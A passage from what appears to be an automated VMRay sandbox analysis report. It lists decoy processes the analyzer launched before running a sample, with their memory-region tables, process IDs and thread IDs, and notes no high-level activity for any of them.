| wow64cpu.dll | 0x5baa0000 | 0x5baa7fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64win.dll | 0x5bab0000 | 0x5bb22fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64.dll | 0x5bb30000 | 0x5bb7efff | Memory Mapped File | rwx |
|
|
|
- |
| dwmapi.dll | 0x74610000 | 0x7462cfff | Memory Mapped File | rwx |
|
|
|
- |
| uxtheme.dll | 0x74630000 | 0x746a4fff | Memory Mapped File | rwx |
|
|
|
- |
| apphelp.dll | 0x746b0000 | 0x74740fff | Memory Mapped File | rwx |
|
|
|
- |
| bcryptprimitives.dll | 0x74750000 | 0x747a8fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x747b0000 | 0x747b9fff | Memory Mapped File | rwx |
|
|
|
- |
| sspicli.dll | 0x747c0000 | 0x747ddfff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x74a00000 | 0x74aabfff | Memory Mapped File | rwx |
|
|
|
- |
| msctf.dll | 0x74df0000 | 0x74f0ffff | Memory Mapped File | rwx |
|
|
|
- |
| imm32.dll | 0x74f10000 | 0x74f3afff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x74f40000 | 0x7502ffff | Memory Mapped File | rwx |
|
|
|
- |
| gdi32.dll | 0x75030000 | 0x7517cfff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x75190000 | 0x75305fff | Memory Mapped File | rwx |
|
|
|
- |
| user32.dll | 0x76c70000 | 0x76daffff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x76f20000 | 0x76fddfff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x772b0000 | 0x772f2fff | Memory Mapped File | rwx |
|
|
|
- |
| combase.dll | 0x77390000 | 0x77549fff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x776b0000 | 0x77828fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x000000007f2bd000 | 0x7f2bd000 | 0x7f2bffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x000000007f2c0000 | 0x7f2c0000 | 0x7f3bffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000007f3c0000 | 0x7f3c0000 | 0x7f3e2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007f3e7000 | 0x7f3e7000 | 0x7f3e7fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007f3ea000 | 0x7f3ea000 | 0x7f3ecfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007f3ed000 | 0x7f3ed000 | 0x7f3edfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7ffc57b4ffff | Private Memory | r |
|
|
|
- |
| ntdll.dll | 0x7ffc57b50000 | 0x7ffc57d11fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x00007ffc57d12000 | 0x7ffc57d12000 | 0x7ffffffeffff | Private Memory | r |
|
|
|
- |
Process #80: sweden_decorative_wit.exe
0
0
| Information | Value |
|---|---|
| ID | #80 |
| File Name | c:\program files\windows nt\sweden_decorative_wit.exe |
| Command Line | "C:\Program Files\Windows NT\sweden_decorative_wit.exe" |
| Initial Working Directory | C:\Program Files\Windows NT\ |
| Monitor | Start Time: 00:02:03, Reason: Child Process |
| Unmonitor | End Time: 00:04:02, Reason: Terminated by Timeout |
| Monitor Duration | 00:01:59 |
| Remark | No high level activity detected in monitored regions |
| Remark | This is a randomly generated process started by the VMRay Analyzer prior to the sample analysis. |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x890 |
| Parent PID | 0x57c (c:\windows\explorer.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | LHNIWSJ\CIiHmnxMn6Ps |
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
D90
0x
784
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| pagefile_0x0000000000d10000 | 0x00d10000 | 0x00d1ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000000d20000 | 0x00d20000 | 0x00d23fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000d30000 | 0x00d30000 | 0x00d30fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000d40000 | 0x00d40000 | 0x00d53fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000d60000 | 0x00d60000 | 0x00d9ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000da0000 | 0x00da0000 | 0x00e9ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000ea0000 | 0x00ea0000 | 0x00ea3fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000eb0000 | 0x00eb0000 | 0x00eb0fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000ec0000 | 0x00ec0000 | 0x00ec1fff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x00ed0000 | 0x00f8dfff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000000fd0000 | 0x00fd0000 | 0x00fd0fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000fe0000 | 0x00fe0000 | 0x00fe3fff | Pagefile Backed Memory | r |
|
|
|
- |
| sweden_decorative_wit.exe | 0x01000000 | 0x01016fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x0000000001120000 | 0x01120000 | 0x011d7fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000001210000 | 0x01210000 | 0x0121ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000001220000 | 0x01220000 | 0x013a7fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000000013b0000 | 0x013b0000 | 0x013effff | Private Memory | rw |
|
|
|
- |
| private_0x0000000001410000 | 0x01410000 | 0x0150ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000001510000 | 0x01510000 | 0x01690fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000000016a0000 | 0x016a0000 | 0x016affff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000016b0000 | 0x016b0000 | 0x02aaffff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000002ab0000 | 0x02ab0000 | 0x02baffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002c60000 | 0x02c60000 | 0x02c6ffff | Private Memory | rw |
|
|
|
- |
| wow64cpu.dll | 0x5baa0000 | 0x5baa7fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64win.dll | 0x5bab0000 | 0x5bb22fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64.dll | 0x5bb30000 | 0x5bb7efff | Memory Mapped File | rwx |
|
|
|
- |
| dwmapi.dll | 0x74610000 | 0x7462cfff | Memory Mapped File | rwx |
|
|
|
- |
| uxtheme.dll | 0x74630000 | 0x746a4fff | Memory Mapped File | rwx |
|
|
|
- |
| apphelp.dll | 0x746b0000 | 0x74740fff | Memory Mapped File | rwx |
|
|
|
- |
| bcryptprimitives.dll | 0x74750000 | 0x747a8fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x747b0000 | 0x747b9fff | Memory Mapped File | rwx |
|
|
|
- |
| sspicli.dll | 0x747c0000 | 0x747ddfff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x74a00000 | 0x74aabfff | Memory Mapped File | rwx |
|
|
|
- |
| msctf.dll | 0x74df0000 | 0x74f0ffff | Memory Mapped File | rwx |
|
|
|
- |
| imm32.dll | 0x74f10000 | 0x74f3afff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x74f40000 | 0x7502ffff | Memory Mapped File | rwx |
|
|
|
- |
| gdi32.dll | 0x75030000 | 0x7517cfff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x75190000 | 0x75305fff | Memory Mapped File | rwx |
|
|
|
- |
| user32.dll | 0x76c70000 | 0x76daffff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x76f20000 | 0x76fddfff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x772b0000 | 0x772f2fff | Memory Mapped File | rwx |
|
|
|
- |
| combase.dll | 0x77390000 | 0x77549fff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x776b0000 | 0x77828fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000000007efc0000 | 0x7efc0000 | 0x7f0bffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000007f0c0000 | 0x7f0c0000 | 0x7f0e2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007f0e3000 | 0x7f0e3000 | 0x7f0e3fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007f0e4000 | 0x7f0e4000 | 0x7f0e6fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007f0e7000 | 0x7f0e7000 | 0x7f0e7fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007f0ed000 | 0x7f0ed000 | 0x7f0effff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7ffc57b4ffff | Private Memory | r |
|
|
|
- |
| ntdll.dll | 0x7ffc57b50000 | 0x7ffc57d11fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x00007ffc57d12000 | 0x7ffc57d12000 | 0x7ffffffeffff | Private Memory | r |
|
|
|
- |
Process #81: se-viii.exe
0
0
| Information | Value |
|---|---|
| ID | #81 |
| File Name | c:\program files\java\se-viii.exe |
| Command Line | "C:\Program Files\Java\se-viii.exe" |
| Initial Working Directory | C:\Program Files\Java\ |
| Monitor | Start Time: 00:02:03, Reason: Child Process |
| Unmonitor | End Time: 00:04:02, Reason: Terminated by Timeout |
| Monitor Duration | 00:01:59 |
| Remark | No high level activity detected in monitored regions |
| Remark | This is a randomly generated process started by the VMRay Analyzer prior to the sample analysis. |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xa50 |
| Parent PID | 0x57c (c:\windows\explorer.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | LHNIWSJ\CIiHmnxMn6Ps |
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
D8C
0x
A80
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| pagefile_0x00000000007d0000 | 0x007d0000 | 0x007dffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x00000000007e0000 | 0x007e0000 | 0x007e3fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000007f0000 | 0x007f0000 | 0x007f0fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000800000 | 0x00800000 | 0x00813fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000820000 | 0x00820000 | 0x0085ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000860000 | 0x00860000 | 0x00863fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000870000 | 0x00870000 | 0x00870fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000880000 | 0x00880000 | 0x00881fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000008d0000 | 0x008d0000 | 0x008d0fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000008e0000 | 0x008e0000 | 0x008e3fff | Pagefile Backed Memory | r |
|
|
|
- |
| se-viii.exe | 0x00920000 | 0x00936fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x0000000000940000 | 0x00940000 | 0x00a3ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000a40000 | 0x00a40000 | 0x00a7ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000a90000 | 0x00a90000 | 0x00a9ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000aa0000 | 0x00aa0000 | 0x00aaffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000af0000 | 0x00af0000 | 0x00afffff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x00b00000 | 0x00bbdfff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x0000000000bc0000 | 0x00bc0000 | 0x00c77fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000c90000 | 0x00c90000 | 0x00d8ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000e90000 | 0x00e90000 | 0x01017fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000001020000 | 0x01020000 | 0x011a0fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000011b0000 | 0x011b0000 | 0x025affff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000000025b0000 | 0x025b0000 | 0x026affff | Private Memory | rw |
|
|
|
- |
| wow64cpu.dll | 0x5baa0000 | 0x5baa7fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64win.dll | 0x5bab0000 | 0x5bb22fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64.dll | 0x5bb30000 | 0x5bb7efff | Memory Mapped File | rwx |
|
|
|
- |
| dwmapi.dll | 0x74610000 | 0x7462cfff | Memory Mapped File | rwx |
|
|
|
- |
| uxtheme.dll | 0x74630000 | 0x746a4fff | Memory Mapped File | rwx |
|
|
|
- |
| apphelp.dll | 0x746b0000 | 0x74740fff | Memory Mapped File | rwx |
|
|
|
- |
| bcryptprimitives.dll | 0x74750000 | 0x747a8fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x747b0000 | 0x747b9fff | Memory Mapped File | rwx |
|
|
|
- |
| sspicli.dll | 0x747c0000 | 0x747ddfff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x74a00000 | 0x74aabfff | Memory Mapped File | rwx |
|
|
|
- |
| msctf.dll | 0x74df0000 | 0x74f0ffff | Memory Mapped File | rwx |
|
|
|
- |
| imm32.dll | 0x74f10000 | 0x74f3afff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x74f40000 | 0x7502ffff | Memory Mapped File | rwx |
|
|
|
- |
| gdi32.dll | 0x75030000 | 0x7517cfff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x75190000 | 0x75305fff | Memory Mapped File | rwx |
|
|
|
- |
| user32.dll | 0x76c70000 | 0x76daffff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x76f20000 | 0x76fddfff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x772b0000 | 0x772f2fff | Memory Mapped File | rwx |
|
|
|
- |
| combase.dll | 0x77390000 | 0x77549fff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x776b0000 | 0x77828fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000000007f580000 | 0x7f580000 | 0x7f67ffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000007f680000 | 0x7f680000 | 0x7f6a2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007f6a3000 | 0x7f6a3000 | 0x7f6a5fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007f6a9000 | 0x7f6a9000 | 0x7f6abfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007f6ac000 | 0x7f6ac000 | 0x7f6acfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007f6af000 | 0x7f6af000 | 0x7f6affff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7ffc57b4ffff | Private Memory | r |
|
|
|
- |
| ntdll.dll | 0x7ffc57b50000 | 0x7ffc57d11fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x00007ffc57d12000 | 0x7ffc57d12000 | 0x7ffffffeffff | Private Memory | r |
|
|
|
- |
Process #82: separate.exe
0
0
| Information | Value |
|---|---|
| ID | #82 |
| File Name | c:\program files\windows multimedia platform\separate.exe |
| Command Line | "C:\Program Files\Windows Multimedia Platform\separate.exe" |
| Initial Working Directory | C:\Program Files\Windows Multimedia Platform\ |
| Monitor | Start Time: 00:02:03, Reason: Child Process |
| Unmonitor | End Time: 00:04:02, Reason: Terminated by Timeout |
| Monitor Duration | 00:01:59 |
| Remark | No high level activity detected in monitored regions |
| Remark | This is a randomly generated process started by the VMRay Analyzer prior to the sample analysis. |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x8c4 |
| Parent PID | 0x57c (c:\windows\explorer.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | LHNIWSJ\CIiHmnxMn6Ps |
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
D88
0x
2CC
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| pagefile_0x0000000000ae0000 | 0x00ae0000 | 0x00aeffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000000af0000 | 0x00af0000 | 0x00af3fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000b00000 | 0x00b00000 | 0x00b00fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000b10000 | 0x00b10000 | 0x00b23fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000b30000 | 0x00b30000 | 0x00b6ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000b70000 | 0x00b70000 | 0x00b73fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000b80000 | 0x00b80000 | 0x00b80fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000b90000 | 0x00b90000 | 0x00b91fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000ba0000 | 0x00ba0000 | 0x00ba0fff | Private Memory | rw |
|
|
|
- |
| separate.exe | 0x00bb0000 | 0x00bc6fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x0000000000bd0000 | 0x00bd0000 | 0x00ccffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000cd0000 | 0x00cd0000 | 0x00cd3fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000d00000 | 0x00d00000 | 0x00dfffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000e70000 | 0x00e70000 | 0x00e7ffff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x00e80000 | 0x00f3dfff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x0000000001040000 | 0x01040000 | 0x011c7fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000011d0000 | 0x011d0000 | 0x01287fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000001290000 | 0x01290000 | 0x012cffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000001350000 | 0x01350000 | 0x0135ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000001360000 | 0x01360000 | 0x014e0fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000014f0000 | 0x014f0000 | 0x028effff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000000028f0000 | 0x028f0000 | 0x029effff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002aa0000 | 0x02aa0000 | 0x02aaffff | Private Memory | rw |
|
|
|
- |
| wow64cpu.dll | 0x5baa0000 | 0x5baa7fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64win.dll | 0x5bab0000 | 0x5bb22fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64.dll | 0x5bb30000 | 0x5bb7efff | Memory Mapped File | rwx |
|
|
|
- |
| dwmapi.dll | 0x74610000 | 0x7462cfff | Memory Mapped File | rwx |
|
|
|
- |
| uxtheme.dll | 0x74630000 | 0x746a4fff | Memory Mapped File | rwx |
|
|
|
- |
| apphelp.dll | 0x746b0000 | 0x74740fff | Memory Mapped File | rwx |
|
|
|
- |
| bcryptprimitives.dll | 0x74750000 | 0x747a8fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x747b0000 | 0x747b9fff | Memory Mapped File | rwx |
|
|
|
- |
| sspicli.dll | 0x747c0000 | 0x747ddfff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x74a00000 | 0x74aabfff | Memory Mapped File | rwx |
|
|
|
- |
| msctf.dll | 0x74df0000 | 0x74f0ffff | Memory Mapped File | rwx |
|
|
|
- |
| imm32.dll | 0x74f10000 | 0x74f3afff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x74f40000 | 0x7502ffff | Memory Mapped File | rwx |
|
|
|
- |
| gdi32.dll | 0x75030000 | 0x7517cfff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x75190000 | 0x75305fff | Memory Mapped File | rwx |
|
|
|
- |
| user32.dll | 0x76c70000 | 0x76daffff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x76f20000 | 0x76fddfff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x772b0000 | 0x772f2fff | Memory Mapped File | rwx |
|
|
|
- |
| combase.dll | 0x77390000 | 0x77549fff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x776b0000 | 0x77828fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000000007ecf0000 | 0x7ecf0000 | 0x7edeffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000007edf0000 | 0x7edf0000 | 0x7ee12fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007ee15000 | 0x7ee15000 | 0x7ee15fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ee16000 | 0x7ee16000 | 0x7ee18fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ee1c000 | 0x7ee1c000 | 0x7ee1efff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ee1f000 | 0x7ee1f000 | 0x7ee1ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7ffc57b4ffff | Private Memory | r |
|
|
|
- |
| ntdll.dll | 0x7ffc57b50000 | 0x7ffc57d11fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x00007ffc57d12000 | 0x7ffc57d12000 | 0x7ffffffeffff | Private Memory | r |
|
|
|
- |
Process #83: bulgaria.exe
0
0
| Information | Value |
|---|---|
| ID | #83 |
| File Name | c:\program files\reference assemblies\bulgaria.exe |
| Command Line | "C:\Program Files\Reference Assemblies\bulgaria.exe" |
| Initial Working Directory | C:\Program Files\Reference Assemblies\ |
| Monitor | Start Time: 00:02:03, Reason: Child Process |
| Unmonitor | End Time: 00:04:02, Reason: Terminated by Timeout |
| Monitor Duration | 00:01:59 |
| Remark | No high level activity detected in monitored regions |
| Remark | This is a randomly generated process started by the VMRay Analyzer prior to the sample analysis. |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x378 |
| Parent PID | 0x57c (c:\windows\explorer.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | LHNIWSJ\CIiHmnxMn6Ps |
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
D84
0x
A10
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| bulgaria.exe | 0x00f90000 | 0x00fa6fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x0000000000fb0000 | 0x00fb0000 | 0x00fbffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000000fc0000 | 0x00fc0000 | 0x00fc3fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000fd0000 | 0x00fd0000 | 0x00fd0fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000fe0000 | 0x00fe0000 | 0x00ff3fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000001000000 | 0x01000000 | 0x0103ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000001040000 | 0x01040000 | 0x0113ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000001140000 | 0x01140000 | 0x01143fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000001150000 | 0x01150000 | 0x01150fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000001160000 | 0x01160000 | 0x01161fff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x01170000 | 0x0122dfff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000001270000 | 0x01270000 | 0x01270fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000001280000 | 0x01280000 | 0x01283fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000001290000 | 0x01290000 | 0x012cffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000001310000 | 0x01310000 | 0x0131ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000001440000 | 0x01440000 | 0x0153ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000001540000 | 0x01540000 | 0x016c7fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000016d0000 | 0x016d0000 | 0x01787fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000000017b0000 | 0x017b0000 | 0x017bffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000017c0000 | 0x017c0000 | 0x017cffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000017d0000 | 0x017d0000 | 0x01950fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000001960000 | 0x01960000 | 0x02d5ffff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000002d60000 | 0x02d60000 | 0x02e5ffff | Private Memory | rw |
|
|
|
- |
| wow64cpu.dll | 0x5baa0000 | 0x5baa7fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64win.dll | 0x5bab0000 | 0x5bb22fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64.dll | 0x5bb30000 | 0x5bb7efff | Memory Mapped File | rwx |
|
|
|
- |
| dwmapi.dll | 0x74610000 | 0x7462cfff | Memory Mapped File | rwx |
|
|
|
- |
| uxtheme.dll | 0x74630000 | 0x746a4fff | Memory Mapped File | rwx |
|
|
|
- |
| apphelp.dll | 0x746b0000 | 0x74740fff | Memory Mapped File | rwx |
|
|
|
- |
| bcryptprimitives.dll | 0x74750000 | 0x747a8fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x747b0000 | 0x747b9fff | Memory Mapped File | rwx |
|
|
|
- |
| sspicli.dll | 0x747c0000 | 0x747ddfff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x74a00000 | 0x74aabfff | Memory Mapped File | rwx |
|
|
|
- |
| msctf.dll | 0x74df0000 | 0x74f0ffff | Memory Mapped File | rwx |
|
|
|
- |
| imm32.dll | 0x74f10000 | 0x74f3afff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x74f40000 | 0x7502ffff | Memory Mapped File | rwx |
|
|
|
- |
| gdi32.dll | 0x75030000 | 0x7517cfff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x75190000 | 0x75305fff | Memory Mapped File | rwx |
|
|
|
- |
| user32.dll | 0x76c70000 | 0x76daffff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x76f20000 | 0x76fddfff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x772b0000 | 0x772f2fff | Memory Mapped File | rwx |
|
|
|
- |
| combase.dll | 0x77390000 | 0x77549fff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x776b0000 | 0x77828fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000000007f220000 | 0x7f220000 | 0x7f31ffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000007f320000 | 0x7f320000 | 0x7f342fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007f343000 | 0x7f343000 | 0x7f343fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007f345000 | 0x7f345000 | 0x7f347fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007f34b000 | 0x7f34b000 | 0x7f34bfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007f34d000 | 0x7f34d000 | 0x7f34ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7ffc57b4ffff | Private Memory | r |
|
|
|
- |
| ntdll.dll | 0x7ffc57b50000 | 0x7ffc57d11fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x00007ffc57d12000 | 0x7ffc57d12000 | 0x7ffffffeffff | Private Memory | r |
|
|
|
- |
Process #84: advertisement-beginners.exe
0
0
| Information | Value |
|---|---|
| ID | #84 |
| File Name | c:\program files\windows mail\advertisement-beginners.exe |
| Command Line | "C:\Program Files\Windows Mail\advertisement-beginners.exe" |
| Initial Working Directory | C:\Program Files\Windows Mail\ |
| Monitor | Start Time: 00:02:03, Reason: Child Process |
| Unmonitor | End Time: 00:04:02, Reason: Terminated by Timeout |
| Monitor Duration | 00:01:59 |
